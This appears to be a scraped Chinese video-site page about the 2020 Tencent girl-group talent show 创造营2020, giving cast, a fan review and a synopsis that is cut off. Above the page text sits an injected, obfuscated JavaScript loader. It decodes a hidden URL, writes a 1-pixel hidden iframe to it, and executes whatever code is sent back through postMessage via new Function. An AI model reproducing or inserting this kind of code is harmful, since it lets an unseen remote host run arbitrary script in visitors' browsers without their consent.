if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 
首页 » 综艺片 » 创造营2020
创造营2020

创造营2020

(2020)
状态:更新至200503期
别名:
类型:内地综艺
主演:黄子韬 鹿晗 毛不易 宋茜 大张伟
片长:
语言:中国大陆
时间:2020-05-03
.

《创造营2020》一句话点评:

第一期观感很不错,认认真真的比拼实力让这季的赛制有了很大提升,当然竞争也真的很激烈啊,一个个漂亮小姐姐都很吸引我这种直男,舞技也活力四射,青春昂扬,那两个可爱组的battle连直男也不能拒绝哈哈哈哈,要为她们打call!!这期太有意思了,开场就是舞蹈担当的比拼,还是一个人就能带进整个团队,女团不就是需要这种凝聚力吗!小姐姐们都对自己很有信心,有机会就表现自己,积极举手要求展示,很青春正能量!

  • 剧情

  • 《创造营2020》是腾讯视频出品的能量女团成长综艺,由黄子韬、鹿晗、毛不易、宋茜等作为创造营女孩们的教练 [1-2] 。该节目召集百位学员,通过任务、训练、考核,让她们在五位明星教练的带领和引导下成长进步,最终选择7位学员成团 [1] [3] 。节目于2020年5月2日起,每周六、周日20:00在腾讯视频独播!黄子韬的专业,毛不易的感性,大张伟的逗比,鹿晗又帅又顾及学员感受,宋茜专业又像个知心姐姐,这教练团阵容真是没谁了!这一次学员们的实力也很强啊,开场抢首发成团位就见证实力了,更期待后面的表演了!这一季